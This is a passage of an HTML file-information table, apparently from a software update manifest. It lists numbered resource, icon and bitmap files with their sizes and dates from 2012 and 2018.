applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15001</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15002</td><td>Not applicable</td><td>4,492</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15004</td><td>Not applicable</td><td>192</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>1501</td><td>Not applicable</td><td>704</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1502</td><td>Not applicable</td><td>944</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15020.bmp</td><td>Not applicable</td><td>1,910</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15021.bmp</td><td>Not applicable</td><td>246</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15023</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15024</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15025</td><td>Not applicable</td><td>2</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15026</td><td>Not applicable</td><td>2</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15027</td><td>Not applicable</td><td>2</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>1504</td><td>Not applicable</td><td>704</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1505</td><td>Not applicable</td><td>604</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1506</td><td>Not applicable</td><td>456</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1507</td><td>Not applicable</td><td>852</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1508</td><td>Not applicable</td><td>976</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1509</td><td>Not applicable</td><td>768</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>151</td><td>Not applicable</td><td>132</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>151.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1510</td><td>Not applicable</td><td>704</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15105</td><td>Not applicable</td><td>2,132</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15106</td><td>Not applicable</td><td>1,532</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15107</td><td>Not applicable</td><td>1,420</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15108</td><td>Not applicable</td><td>398</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15109</td><td>Not applicable</td><td>672</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>1511</td><td>Not applicable</td><td>270</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15110</td><td>Not applicable</td><td>1,064</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15115</td><td>Not applicable</td><td>180</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>152.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1521</td><td>Not applicable</td><td>880</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1522</td><td>Not applicable</td><td>1,284</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1525</td><td>Not applicable</td><td>1,084</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1528</td><td>Not applicable</td><td>964</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1529</td><td>Not applicable</td><td>984</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>153.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15355</td><td>Not applicable</td><td>300</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>154.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>155.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15504</td><td>Not applicable</td><td>272</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15505</td><td>Not applicable</td><td>1,080</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15506</td><td>Not applicable</td><td>1,088</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15507</td><td>Not applicable</td><td>820</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15508</td><td>Not applicable</td><td>540</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15509</td><td>Not applicable</td><td>340</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15594.bmp</td><td>Not applicable</td><td>630</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>156.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15600</td><td>Not applicable</td><td>88</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15601</td><td>Not applicable</td><td>90</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15602</td><td>Not applicable</td><td>776</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15607</td><td>Not applicable</td><td>232</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15610</td><td>Not applicable</td><td>1,360</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15613</td><td>Not applicable</td><td>228</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15616</td><td>Not applicable</td><td>900</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15650</td><td>Not applicable</td><td>76</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>157.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15700</td><td>Not applicable</td><td>98</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15710</td><td>Not applicable</td><td>26</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15720</td><td>Not applicable</td><td>140</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15730</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>158.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>159.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15904</td><td>Not applicable</td><td>2</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15906</td><td>Not applicable</td><td>780</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15907</td><td>Not applicable</td><td>632</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15908</td><td>Not applicable</td><td>1,420</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15909</td><td>Not applicable</td><td>588</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15911</td><td>Not applicable</td><td>152</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15912</td><td>Not applicable</td><td>464</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15913</td><td>Not applicable</td><td>1,134</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15915</td><td>Not applicable</td><td>564</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15916</td><td>Not applicable</td><td>920</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15917</td><td>Not applicable</td><td>270</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15919</td><td>Not applicable</td><td>728</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15920.bmp</td><td>Not applicable</td><td>246</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>15921.bmp</td><td>Not applicable</td><td>246</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>16</td><td>Not applicable</td><td>978</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>16.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>160.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>161.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>16100</td><td>Not applicable</td><td>444</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>162.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>163.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>164.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>165.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>166.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>167.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>168.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>169.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>17</td><td>Not applicable</td><td>106</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>17.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>170.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1703</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>171.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>172.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>17200</td><td>Not applicable</td><td>220</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>17209</td><td>Not applicable</td><td>282</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>17269</td><td>Not applicable</td><td>888</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>173.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>17309</td><td>Not applicable</td><td>1,240</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>174.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>175.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>17510</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>17518</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>17519</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>17523</td><td>Not applicable</td><td>34</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>17535</td><td>Not applicable</td><td>20</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>176.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>177.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>178.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>179.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>18</td><td>Not applicable</td><td>1,504</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>18.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>180.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1809</td><td>Not applicable</td><td>728</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>181.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1810</td><td>Not applicable</td><td>952</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>182.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>183.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>184.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>185.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>186.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>187.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>188.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>18894</td><td>Not applicable</td><td>20</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>189.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>19</td><td>Not applicable</td><td>36</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>19.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>190.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1900</td><td>Not applicable</td><td>1,596</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1901</td><td>Not applicable</td><td>360</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1902</td><td>Not applicable</td><td>3,228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>191.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1911</td><td>Not applicable</td><td>416</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>192.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>193.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>194.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>195.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>196</td><td>Not applicable</td><td>149</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>196.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>197.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>198.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>199</td><td>Not applicable</td><td>158</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>199.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2</td><td>Not applicable</td><td>410</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2.jpg</td><td>Not applicable</td><td>1,889</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20</td><td>Not applicable</td><td>744</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>200</td><td>Not applicable</td><td>13,532</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>200.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2000</td><td>Not applicable</td><td>1,612</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2001</td><td>Not applicable</td><td>424</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2002</td><td>Not applicable</td><td>252</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2003</td><td>Not applicable</td><td>180</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2004</td><td>Not applicable</td><td>252</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2005</td><td>Not applicable</td><td>688</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2006</td><td>Not applicable</td><td>880</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2007</td><td>Not applicable</td><td>56</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2008</td><td>Not applicable</td><td>56</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2009</td><td>Not applicable</td><td>280</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>201.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2010</td><td>Not applicable</td><td>512</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20100</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20101</td><td>Not applicable</td><td>136</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20102</td><td>Not applicable</td><td>202</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20103</td><td>Not applicable</td><td>440</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20104</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20105</td><td>Not applicable</td><td>362</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20106</td><td>Not applicable</td><td>470</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2012</td><td>Not applicable</td><td>364</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2013</td><td>Not applicable</td><td>336</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2014</td><td>Not applicable</td><td>528</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2015</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2016</td><td>Not applicable</td><td>368</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2017</td><td>Not applicable</td><td>210</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>2018</td><td>Not applicable</td><td>144</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>202</td><td>Not applicable</td><td>9,484</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>202.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>203</td><td>Not applicable</td><td>14,848</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>203.bmp</td><td>Not applicable</td><td>2,166</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>203.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>204.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>204.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>205.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20511</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20512</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20513</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20514</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20515</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>206</td><td>Not applicable</td><td>3,584</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>206.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20600</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20601</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20602</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20603</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20604</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20610</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20611</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20612</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20613</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20614</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20615</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20616</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20620</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20621</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20622</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20623</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20624</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20625</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20626</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20627</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20628</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20629</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20630</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20631</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20632</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20633</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20634</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20635</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>207</td><td>Not applicable</td><td>17,408</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>207.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20712</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20713</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20714</td><td>Not applicable</td><td>118</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20715</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20716</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20717</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20718</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20719</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20720</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20721</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20722</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20723</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20724</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20725</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20726</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20727</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20728</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20729</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20730</td><td>Not applicable</td><td>104</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20731</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20732</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>208.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>20800</td><td>Not 